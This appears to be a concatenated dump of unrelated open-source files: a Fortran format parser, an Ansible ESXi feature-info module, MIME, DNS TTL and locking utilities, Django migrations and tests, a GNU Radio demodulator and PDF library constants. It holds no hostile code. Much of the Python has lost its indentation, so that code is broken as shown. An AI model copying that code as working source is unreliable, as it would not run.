finfo = np.finfo(n.dtype)
# Number of digits for fractional part
n_prec = finfo.precision + 1
# Number of digits for exponential part
n_exp = number_digits(np.max(np.abs([finfo.maxexp, finfo.minexp])))
width = 1 + 1 + n_prec + 1 + n_exp + 1
if n < 0:
width += 1
repeat = int(np.floor(80 / width))
return cls(width, n_prec, min, repeat=repeat)
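        # e.g. for a float64 value: precision 15 -> n_prec == 16 plus a 4-digit
        # exponent field, so width == 1 + 1 + 16 + 1 + 4 + 1 == 24 and repeat == 3,
        # i.e. the "(3E24.16)" Fortran format.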
def __init__(self, width, significand, min=None, repeat=None):
"""\
Parameters
----------
width : int
number of characters taken by the string (includes space).
"""
self.width = width
self.significand = significand
self.repeat = repeat
self.min = min
def __repr__(self):
r = "ExpFormat("
if self.repeat:
r += "%d" % self.repeat
r += "E%d.%d" % (self.width, self.significand)
if self.min:
r += "E%d" % self.min
return r + ")"
@property
def fortran_format(self):
r = "("
if self.repeat:
r += "%d" % self.repeat
r += "E%d.%d" % (self.width, self.significand)
if self.min:
r += "E%d" % self.min
return r + ")"
@property
def python_format(self):
return "%" + str(self.width-1) + "." + str(self.significand) + "E"
class Token(object):
def __init__(self, type, value, pos):
self.type = type
self.value = value
self.pos = pos
def __str__(self):
return """Token('%s', "%s")""" % (self.type, self.value)
def __repr__(self):
return self.__str__()
class Tokenizer(object):
def __init__(self):
self.tokens = list(TOKENS.keys())
self.res = [re.compile(TOKENS[i]) for i in self.tokens]
def input(self, s):
self.data = s
self.curpos = 0
self.len = len(s)
def next_token(self):
curpos = self.curpos
tokens = self.tokens
while curpos < self.len:
for i, r in enumerate(self.res):
m = r.match(self.data, curpos)
if m is None:
continue
else:
self.curpos = m.end()
return Token(self.tokens[i], m.group(), self.curpos)
else:
raise SyntaxError("Unknown character at position %d (%s)"
% (self.curpos, self.data[curpos]))
# Grammar for fortran format:
# format : LPAR format_string RPAR
# format_string : repeated | simple
# repeated : repeat simple
# simple : int_fmt | exp_fmt
# int_fmt : INT_ID width
# exp_fmt : simple_exp_fmt
# simple_exp_fmt : EXP_ID width DOT significand
# extended_exp_fmt : EXP_ID width DOT significand EXP_ID ndigits
# repeat : INT
# width : INT
# significand : INT
# ndigits : INT
# Naive fortran formatter - parser is hand-made
class FortranFormatParser(object):
"""Parser for fortran format strings. The parse method returns a *Format
instance.
Notes
-----
Only ExpFormat (exponential format for floating values) and IntFormat
(integer format) for now.
"""
def __init__(self):
self.tokenizer = Tokenizer()
def parse(self, s):
self.tokenizer.input(s)
tokens = []
try:
while True:
t = self.tokenizer.next_token()
if t is None:
break
else:
tokens.append(t)
return self._parse_format(tokens)
except SyntaxError as e:
raise BadFortranFormat(str(e))
def _get_min(self, tokens):
next = tokens.pop(0)
if not next.type == "DOT":
raise SyntaxError()
next = tokens.pop(0)
return next.value
def _expect(self, token, tp):
if not token.type == tp:
raise SyntaxError()
def _parse_format(self, tokens):
if not tokens[0].type == "LPAR":
raise SyntaxError("Expected left parenthesis at position "
"%d (got '%s')" % (0, tokens[0].value))
elif not tokens[-1].type == "RPAR":
raise SyntaxError("Expected right parenthesis at position "
"%d (got '%s')" % (len(tokens), tokens[-1].value))
tokens = tokens[1:-1]
types = [t.type for t in tokens]
if types[0] == "INT":
repeat = int(tokens.pop(0).value)
else:
repeat = None
next = tokens.pop(0)
if next.type == "INT_ID":
next = self._next(tokens, "INT")
width = int(next.value)
if tokens:
min = int(self._get_min(tokens))
else:
min = None
return IntFormat(width, min, repeat)
elif next.type == "EXP_ID":
next = self._next(tokens, "INT")
width = int(next.value)
next = self._next(tokens, "DOT")
next = self._next(tokens, "INT")
significand = int(next.value)
if tokens:
next = self._next(tokens, "EXP_ID")
next = self._next(tokens, "INT")
min = int(next.value)
else:
min = None
return ExpFormat(width, significand, min, repeat)
else:
            raise SyntaxError("Invalid formatter type %s" % next.value)
def _next(self, tokens, tp):
if not len(tokens) > 0:
raise SyntaxError()
next = tokens.pop(0)
self._expect(next, tp)
return next
|
Dhivyap/ansible | refs/heads/devel | lib/ansible/modules/cloud/vmware/vmware_host_feature_info.py | 21 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2018, Abhijeet Kasurde <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = r'''
---
module: vmware_host_feature_info
short_description: Gathers info about an ESXi host's feature capability information
description:
- This module can be used to gather information about an ESXi host's feature capability information when ESXi hostname or Cluster name is given.
version_added: '2.9'
author:
- Abhijeet Kasurde (@Akasurde)
notes:
- Tested on vSphere 6.5
requirements:
- python >= 2.6
- PyVmomi
options:
cluster_name:
description:
- Name of the cluster from all host systems to be used for information gathering.
- If C(esxi_hostname) is not given, this parameter is required.
type: str
esxi_hostname:
description:
- ESXi hostname to gather information from.
- If C(cluster_name) is not given, this parameter is required.
type: str
extends_documentation_fragment: vmware.documentation
'''
EXAMPLES = r'''
- name: Gather feature capability info about all ESXi Hosts in given Cluster
vmware_host_feature_info:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
cluster_name: cluster_name
delegate_to: localhost
register: all_cluster_hosts_info
- name: Check if ESXi is vulnerable to Speculative Store Bypass Disable (SSBD) vulnerability
vmware_host_feature_info:
hostname: "{{ vcenter_server }}"
username: "{{ vcenter_user }}"
password: "{{ vcenter_pass }}"
validate_certs: no
esxi_hostname: "{{ esxi_hostname }}"
register: features_set
- set_fact:
ssbd : "{{ item.value }}"
    loop: "{{ features_set.hosts_feature_info[esxi_hostname] |json_query(name) }}"
vars:
name: "[?key=='cpuid.SSBD']"
- assert:
that:
- ssbd|int == 1
when: ssbd is defined
'''
RETURN = r'''
hosts_feature_info:
description: metadata about host's feature capability information
returned: always
type: dict
sample: {
"10.76.33.226": [
{
"feature_name": "cpuid.3DNOW",
"key": "cpuid.3DNOW",
"value": "0"
},
{
"feature_name": "cpuid.3DNOWPLUS",
"key": "cpuid.3DNOWPLUS",
"value": "0"
},
]
}
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vmware import vmware_argument_spec, PyVmomi
class FeatureCapabilityInfoManager(PyVmomi):
def __init__(self, module):
super(FeatureCapabilityInfoManager, self).__init__(module)
cluster_name = self.params.get('cluster_name', None)
esxi_host_name = self.params.get('esxi_hostname', None)
self.hosts = self.get_all_host_objs(cluster_name=cluster_name, esxi_host_name=esxi_host_name)
def gather_host_feature_info(self):
host_feature_info = dict()
for host in self.hosts:
host_feature_capabilities = host.config.featureCapability
capability = []
for fc in host_feature_capabilities:
temp_dict = {
'key': fc.key,
'feature_name': fc.featureName,
'value': fc.value,
}
capability.append(temp_dict)
host_feature_info[host.name] = capability
return host_feature_info
def main():
argument_spec = vmware_argument_spec()
argument_spec.update(
cluster_name=dict(type='str', required=False),
esxi_hostname=dict(type='str', required=False),
)
module = AnsibleModule(
argument_spec=argument_spec,
required_one_of=[
['cluster_name', 'esxi_hostname'],
],
supports_check_mode=True,
)
host_capability_manager = FeatureCapabilityInfoManager(module)
module.exit_json(changed=False,
hosts_feature_info=host_capability_manager.gather_host_feature_info())
if __name__ == "__main__":
main()
|
mglukhikh/intellij-community | refs/heads/master | python/lib/Lib/email/mime/multipart.py | 93 | # Copyright (C) 2002-2006 Python Software Foundation
# Author: Barry Warsaw
# Contact: [email protected]
"""Base class for MIME multipart/* type messages."""
__all__ = ['MIMEMultipart']
from email.mime.base import MIMEBase
class MIMEMultipart(MIMEBase):
"""Base class for MIME multipart/* type messages."""
def __init__(self, _subtype='mixed', boundary=None, _subparts=None,
**_params):
"""Creates a multipart/* type message.
By default, creates a multipart/mixed message, with proper
Content-Type and MIME-Version headers.
_subtype is the subtype of the multipart content type, defaulting to
`mixed'.
boundary is the multipart boundary string. By default it is
calculated as needed.
_subparts is a sequence of initial subparts for the payload. It
must be an iterable object, such as a list. You can always
attach new subparts to the message by using the attach() method.
Additional parameters for the Content-Type header are taken from the
keyword arguments (or passed into the _params argument).
"""
MIMEBase.__init__(self, 'multipart', _subtype, **_params)
if _subparts:
for p in _subparts:
self.attach(p)
if boundary:
self.set_boundary(boundary)
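# Minimal usage sketch (the attached subparts are hypothetical; any Message
# instance can be attached):
#   from email.mime.text import MIMEText
#   msg = MIMEMultipart('alternative')
#   msg.attach(MIMEText('plain body'))
#   msg.attach(MIMEText('<p>html body</p>', 'html'))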
|
sabi0/intellij-community | refs/heads/master | python/testData/optimizeImports/importStar.py | 83 | from sys import *
from re import *
compile
|
epage/dialcentral-gtk | refs/heads/master | src/util/concurrent.py | 4 | #!/usr/bin/env python
from __future__ import with_statement
import os
import errno
import time
import functools
import contextlib
def synchronized(lock):
"""
Synchronization decorator.
>>> import misc
>>> misc.validate_decorator(synchronized(object()))
"""
def wrap(f):
@functools.wraps(f)
def newFunction(*args, **kw):
lock.acquire()
try:
return f(*args, **kw)
finally:
lock.release()
return newFunction
return wrap
@contextlib.contextmanager
def qlock(queue, gblock = True, gtimeout = None, pblock = True, ptimeout = None):
"""
Locking with a queue, good for when you want to lock an item passed around
>>> import Queue
>>> item = 5
>>> lock = Queue.Queue()
>>> lock.put(item)
>>> with qlock(lock) as i:
... print i
5
"""
item = queue.get(gblock, gtimeout)
try:
yield item
finally:
queue.put(item, pblock, ptimeout)
@contextlib.contextmanager
def flock(path, timeout=-1):
WAIT_FOREVER = -1
DELAY = 0.1
timeSpent = 0
acquired = False
while timeSpent <= timeout or timeout == WAIT_FOREVER:
try:
fd = os.open(path, os.O_CREAT | os.O_EXCL | os.O_RDWR)
acquired = True
break
except OSError, e:
if e.errno != errno.EEXIST:
raise
time.sleep(DELAY)
timeSpent += DELAY
assert acquired, "Failed to grab file-lock %s within timeout %d" % (path, timeout)
try:
yield fd
finally:
os.unlink(path)
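# flock() above is a cooperative, file-based lock: it polls in 0.1 s steps until
# it can create *path* with O_CREAT | O_EXCL (or the timeout expires), yields the
# open file descriptor, and unlinks the lock file afterwards.  Hypothetical use:
#   with flock("/tmp/example.lock", timeout=5):
#       pass  # critical section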
|
dehein/pypigpio | refs/heads/master | pin13.py | 1 | import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BCM)
GPIO.setup(13, GPIO.OUT)
GPIO.output(13, GPIO.HIGH)
time.sleep(1/5.0)
GPIO.output(13, GPIO.LOW)
time.sleep(1)
print('PIN13 switched on and off')
exit()
|
devs1991/test_edx_docmode | refs/heads/master | venv/lib/python2.7/site-packages/provider/tests/test_utils.py | 3 | """
Test cases for functionality provided by the provider.utils module
"""
from datetime import datetime, date
from django.db import models
from django.test import TestCase
from provider import utils
class UtilsTestCase(TestCase):
def test_serialization(self):
class SomeModel(models.Model):
dt = models.DateTimeField()
t = models.TimeField()
d = models.DateField()
instance = SomeModel(dt=datetime.now(),
d=date.today(),
t=datetime.now().time())
instance.nonfield = 'hello'
data = utils.serialize_instance(instance)
instance2 = utils.deserialize_instance(SomeModel, data)
self.assertEqual(instance.nonfield, instance2.nonfield)
self.assertEqual(instance.d, instance2.d)
self.assertEqual(instance.dt.date(), instance2.dt.date())
for t1, t2 in [(instance.t, instance2.t),
(instance.dt.time(), instance2.dt.time())]:
self.assertEqual(t1.hour, t2.hour)
self.assertEqual(t1.minute, t2.minute)
self.assertEqual(t1.second, t2.second)
# AssertionError:
# datetime.time(10, 6, 28, 705776) !=
# datetime.time(10, 6, 28, 705000)
self.assertEqual(int(t1.microsecond / 1000),
int(t2.microsecond / 1000))
def test_none_child_(self):
class ChildModel(models.Model):
pass
class ParentModel(models.Model):
child = models.ForeignKey(ChildModel, null=True)
reference = ParentModel()
data = utils.serialize_instance(reference)
self.assertEqual(data['child_id'], None)
instance = utils.deserialize_instance(ParentModel, data)
self.assertEqual(instance.child, None)
|
trnewman/VT-USRP-daughterboard-drivers_python | refs/heads/master | gnuradio-core/src/python/gnuradio/blks2impl/am_demod.py | 18 | #
# Copyright 2006,2007 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, optfir
class am_demod_cf(gr.hier_block2):
"""
Generalized AM demodulation block with audio filtering.
This block demodulates a band-limited, complex down-converted AM
    channel into the original baseband signal, applying low pass
filtering to the audio output. It produces a float stream in the
range [-1.0, +1.0].
@param channel_rate: incoming sample rate of the AM baseband
    @type channel_rate: integer
@param audio_decim: input to output decimation rate
@type audio_decim: integer
@param audio_pass: audio low pass filter passband frequency
@type audio_pass: float
@param audio_stop: audio low pass filter stop frequency
@type audio_stop: float
"""
def __init__(self, channel_rate, audio_decim, audio_pass, audio_stop):
gr.hier_block2.__init__(self, "am_demod_cf",
gr.io_signature(1, 1, gr.sizeof_gr_complex), # Input signature
                                gr.io_signature(1, 1, gr.sizeof_float))      # Output signature
MAG = gr.complex_to_mag()
DCR = gr.add_const_ff(-1.0)
audio_taps = optfir.low_pass(0.5, # Filter gain
channel_rate, # Sample rate
audio_pass, # Audio passband
audio_stop, # Audio stopband
0.1, # Passband ripple
60) # Stopband attenuation
LPF = gr.fir_filter_fff(audio_decim, audio_taps)
self.connect(self, MAG, DCR, LPF, self)
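# A rough instantiation sketch (sample rates are illustrative only):
#   demod = am_demod_cf(channel_rate=64000, audio_decim=2,
#                       audio_pass=5000, audio_stop=5500)
# demod_10k0a3e_cf below hard-wires exactly these 5 kHz / 5.5 kHz audio values.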
class demod_10k0a3e_cf(am_demod_cf):
"""
AM demodulation block, 10 KHz channel.
This block demodulates an AM channel conformant to 10K0A3E emission
standards, such as broadcast band AM transmissions.
@param channel_rate: incoming sample rate of the AM baseband
    @type channel_rate: integer
@param audio_decim: input to output decimation rate
@type audio_decim: integer
"""
def __init__(self, channel_rate, audio_decim):
am_demod_cf.__init__(self, channel_rate, audio_decim,
5000, # Audio passband
5500) # Audio stopband
|
huyphan/pyyawhois | refs/heads/master | test/record/parser/test_response_whois_nic_bo_status_available.py | 1 |
# This file is autogenerated. Do not edit it manually.
# If you want change the content of this file, edit
#
# spec/fixtures/responses/whois.nic.bo/status_available
#
# and regenerate the tests with the following script
#
# $ scripts/generate_tests.py
#
from nose.tools import *
from dateutil.parser import parse as time_parse
import yawhois
class TestWhoisNicBoStatusAvailable(object):
def setUp(self):
fixture_path = "spec/fixtures/responses/whois.nic.bo/status_available.txt"
host = "whois.nic.bo"
part = yawhois.record.Part(open(fixture_path, "r").read(), host)
self.record = yawhois.record.Record(None, [part])
def test_status(self):
eq_(self.record.status, 'available')
def test_available(self):
eq_(self.record.available, True)
def test_domain(self):
eq_(self.record.domain, None)
def test_nameservers(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.nameservers)
def test_registered(self):
eq_(self.record.registered, False)
def test_created_on(self):
eq_(self.record.created_on, None)
def test_updated_on(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.updated_on)
def test_domain_id(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.domain_id)
def test_expires_on(self):
eq_(self.record.expires_on, None)
|
wwj718/murp-edx | refs/heads/master | lms/djangoapps/certificates/migrations/0011_auto__del_field_generatedcertificate_certificate_id__add_field_generat.py | 188 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'GeneratedCertificate.certificate_id'
db.delete_column('certificates_generatedcertificate', 'certificate_id')
# Adding field 'GeneratedCertificate.verify_uuid'
db.add_column('certificates_generatedcertificate', 'verify_uuid',
self.gf('django.db.models.fields.CharField')(default='', max_length=32, blank=True),
keep_default=False)
# Adding field 'GeneratedCertificate.download_uuid'
db.add_column('certificates_generatedcertificate', 'download_uuid',
self.gf('django.db.models.fields.CharField')(default='', max_length=32, blank=True),
keep_default=False)
def backwards(self, orm):
# Adding field 'GeneratedCertificate.certificate_id'
db.add_column('certificates_generatedcertificate', 'certificate_id',
self.gf('django.db.models.fields.CharField')(default='', max_length=32, blank=True),
keep_default=False)
# Deleting field 'GeneratedCertificate.verify_uuid'
db.delete_column('certificates_generatedcertificate', 'verify_uuid')
# Deleting field 'GeneratedCertificate.download_uuid'
db.delete_column('certificates_generatedcertificate', 'download_uuid')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'certificates.generatedcertificate': {
'Meta': {'unique_together': "(('user', 'course_id'),)", 'object_name': 'GeneratedCertificate'},
'course_id': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'distinction': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'download_url': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '128', 'blank': 'True'}),
'download_uuid': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'blank': 'True'}),
'grade': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'unavailable'", 'max_length': '32'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'verify_uuid': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['certificates']
|
we3x/organizator | refs/heads/master | projects/backend/organizator/wsgi.py | 1 | """
WSGI config for organizator project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "organizator.settings")
application = get_wsgi_application()
|
seshin/namebench | refs/heads/master | nb_third_party/dns/ttl.py | 248 | # Copyright (C) 2003-2007, 2009, 2010 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""DNS TTL conversion."""
import dns.exception
class BadTTL(dns.exception.SyntaxError):
pass
def from_text(text):
"""Convert the text form of a TTL to an integer.
The BIND 8 units syntax for TTLs (e.g. '1w6d4h3m10s') is supported.
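    For example, '1w6d4h3m10s' is
    1*604800 + 6*86400 + 4*3600 + 3*60 + 10 == 1137790 seconds.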
@param text: the textual TTL
@type text: string
@raises dns.ttl.BadTTL: the TTL is not well-formed
@rtype: int
"""
if text.isdigit():
total = long(text)
else:
if not text[0].isdigit():
raise BadTTL
total = 0L
current = 0L
for c in text:
if c.isdigit():
current *= 10
current += long(c)
else:
c = c.lower()
if c == 'w':
total += current * 604800L
elif c == 'd':
total += current * 86400L
elif c == 'h':
total += current * 3600L
elif c == 'm':
total += current * 60L
elif c == 's':
total += current
else:
raise BadTTL("unknown unit '%s'" % c)
current = 0
if not current == 0:
raise BadTTL("trailing integer")
if total < 0L or total > 2147483647L:
raise BadTTL("TTL should be between 0 and 2^31 - 1 (inclusive)")
return total
|
cortedeltimo/SickRage | refs/heads/master | lib/rtorrent/err.py | 182 | # Copyright (c) 2013 Chris Lucas, <[email protected]>
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from rtorrent.common import convert_version_tuple_to_str
class RTorrentVersionError(Exception):
def __init__(self, min_version, cur_version):
self.min_version = min_version
self.cur_version = cur_version
self.msg = "Minimum version required: {0}".format(
convert_version_tuple_to_str(min_version))
def __str__(self):
return(self.msg)
class MethodError(Exception):
def __init__(self, msg):
self.msg = msg
def __str__(self):
return(self.msg)
|
temmp/android-quill | refs/heads/master | jni/libhpdf-2.3.0RC2/if/python/hpdf_consts.py | 32 | ###
## * << Haru Free PDF Library 2.0.8 >> -- hpdf_consts.h
## *
## * URL http://libharu.org/
## *
## * Copyright (c) 1999-2006 Takeshi Kanno
## *
## * Permission to use, copy, modify, distribute and sell this software
## * and its documentation for any purpose is hereby granted without fee,
## * provided that the above copyright notice appear in all copies and
## * that both that copyright notice and this permission notice appear
## * in supporting documentation.
## * It is provided "as is" without express or implied warranty.
## *
##
## port to python by Li Jun
## http://groups.google.com/group/pythoncia
from hpdf_types import *
#----------------------------------------------------------------------------
HPDF_TRUE =1
HPDF_FALSE =0
HPDF_OK =0
HPDF_NOERROR =0
#----- default values -------------------------------------------------------
# buffer size which is required when we convert to character string.
HPDF_TMP_BUF_SIZ =512
HPDF_SHORT_BUF_SIZ =32
HPDF_REAL_LEN =11
HPDF_INT_LEN =11
HPDF_TEXT_DEFAULT_LEN =256
HPDF_UNICODE_HEADER_LEN =2
HPDF_DATE_TIME_STR_LEN =23
# length of each item defined in PDF
HPDF_BYTE_OFFSET_LEN =10
HPDF_OBJ_ID_LEN =7
HPDF_GEN_NO_LEN =5
# default value of Graphic State
HPDF_DEF_FONT ="Helvetica"
HPDF_DEF_PAGE_LAYOUT =HPDF_PAGE_LAYOUT_SINGLE
HPDF_DEF_PAGE_MODE =HPDF_PAGE_MODE_USE_NONE
HPDF_DEF_WORDSPACE =0
HPDF_DEF_CHARSPACE =0
HPDF_DEF_FONTSIZE =10
HPDF_DEF_HSCALING =100
HPDF_DEF_LEADING =0
HPDF_DEF_RENDERING_MODE =HPDF_FILL
HPDF_DEF_RISE =0
HPDF_DEF_RAISE =HPDF_DEF_RISE
HPDF_DEF_LINEWIDTH =1
HPDF_DEF_LINECAP =HPDF_BUTT_END
HPDF_DEF_LINEJOIN =HPDF_MITER_JOIN
HPDF_DEF_MITERLIMIT =10
HPDF_DEF_FLATNESS =1
HPDF_DEF_PAGE_NUM =1
HPDF_BS_DEF_WIDTH =1
# default page-size
HPDF_DEF_PAGE_WIDTH =595.276
HPDF_DEF_PAGE_HEIGHT =841.89
HPDF_VERSION_TEXT ="2.0.8"
#---------------------------------------------------------------------------
#----- compression mode ----------------------------------------------------
HPDF_COMP_NONE =0x00
HPDF_COMP_TEXT =0x01
HPDF_COMP_IMAGE =0x02
HPDF_COMP_METADATA =0x04
HPDF_COMP_ALL =0x0F
HPDF_COMP_BEST_COMPRESS =0x10
HPDF_COMP_BEST_SPEED =0x20
HPDF_COMP_MASK =0xFF
#----------------------------------------------------------------------------
#----- permission flags (only Revision 2 is supported)-----------------------
HPDF_ENABLE_READ =0
HPDF_ENABLE_PRINT =4
HPDF_ENABLE_EDIT_ALL =8
HPDF_ENABLE_COPY =16
HPDF_ENABLE_EDIT =32
#----------------------------------------------------------------------------
#------ viewer preferences definitions --------------------------------------
HPDF_HIDE_TOOLBAR =1
HPDF_HIDE_MENUBAR =2
HPDF_HIDE_WINDOW_UI =4
HPDF_FIT_WINDOW =8
HPDF_CENTER_WINDOW =16
#---------------------------------------------------------------------------
#------ limitation of object implementation (PDF1.4) -----------------------
HPDF_LIMIT_MAX_INT =2147483647
HPDF_LIMIT_MIN_INT =-2147483647
HPDF_LIMIT_MAX_REAL =32767
HPDF_LIMIT_MIN_REAL =-32767
HPDF_LIMIT_MAX_STRING_LEN =65535
HPDF_LIMIT_MAX_NAME_LEN =127
HPDF_LIMIT_MAX_ARRAY =8191
HPDF_LIMIT_MAX_DICT_ELEMENT =4095
HPDF_LIMIT_MAX_XREF_ELEMENT =8388607
HPDF_LIMIT_MAX_GSTATE =28
HPDF_LIMIT_MAX_DEVICE_N =8
HPDF_LIMIT_MAX_DEVICE_N_V15 =32
HPDF_LIMIT_MAX_CID =65535
HPDF_MAX_GENERATION_NUM =65535
HPDF_MIN_PAGE_HEIGHT =3
HPDF_MIN_PAGE_WIDTH =3
HPDF_MAX_PAGE_HEIGHT =14400
HPDF_MAX_PAGE_WIDTH =14400
HPDF_MIN_MAGNIFICATION_FACTOR =8
HPDF_MAX_MAGNIFICATION_FACTOR =3200
#---------------------------------------------------------------------------
#------ limitation of various properties -----------------------------------
HPDF_MIN_PAGE_SIZE =3
HPDF_MAX_PAGE_SIZE =14400
HPDF_MIN_HORIZONTALSCALING =10
HPDF_MAX_HORIZONTALSCALING =300
HPDF_MIN_WORDSPACE =-30
HPDF_MAX_WORDSPACE =300
HPDF_MIN_CHARSPACE =-30
HPDF_MAX_CHARSPACE =300
HPDF_MAX_FONTSIZE =300
HPDF_MAX_ZOOMSIZE =10
HPDF_MAX_LEADING =300
HPDF_MAX_LINEWIDTH =100
HPDF_MAX_DASH_PATTERN =100
HPDF_MAX_JWW_NUM =128
#----------------------------------------------------------------------------
#----- country code definition ----------------------------------------------
HPDF_COUNTRY_AF ="AF" # AFGHANISTAN
HPDF_COUNTRY_AL ="AL" # ALBANIA
HPDF_COUNTRY_DZ ="DZ" # ALGERIA
HPDF_COUNTRY_AS ="AS" # AMERICAN SAMOA
HPDF_COUNTRY_AD ="AD" # ANDORRA
HPDF_COUNTRY_AO ="AO" # ANGOLA
HPDF_COUNTRY_AI ="AI" # ANGUILLA
HPDF_COUNTRY_AQ ="AQ" # ANTARCTICA
HPDF_COUNTRY_AG ="AG" # ANTIGUA AND BARBUDA
HPDF_COUNTRY_AR ="AR" # ARGENTINA
HPDF_COUNTRY_AM ="AM" # ARMENIA
HPDF_COUNTRY_AW ="AW" # ARUBA
HPDF_COUNTRY_AU ="AU" # AUSTRALIA
